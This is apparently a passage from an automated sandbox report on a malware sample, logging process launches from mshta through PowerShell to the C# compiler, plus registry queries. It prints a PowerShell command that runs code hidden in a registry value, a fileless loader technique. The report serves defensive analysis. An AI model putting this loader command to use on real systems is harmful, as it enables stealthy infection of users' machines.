            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6052 CREDAT:75038 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.cmdline'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES235.tmp' 'c:\Users\user\AppData\Local\Temp\CSC37C4AB5BD67C482EA05BF33DBF5C85DE.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES12CF.tmp' 'c:\Users\user\AppData\Local\Temp\CSCF573EE57D69F4661A05CCF421E73DB.TMP'
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\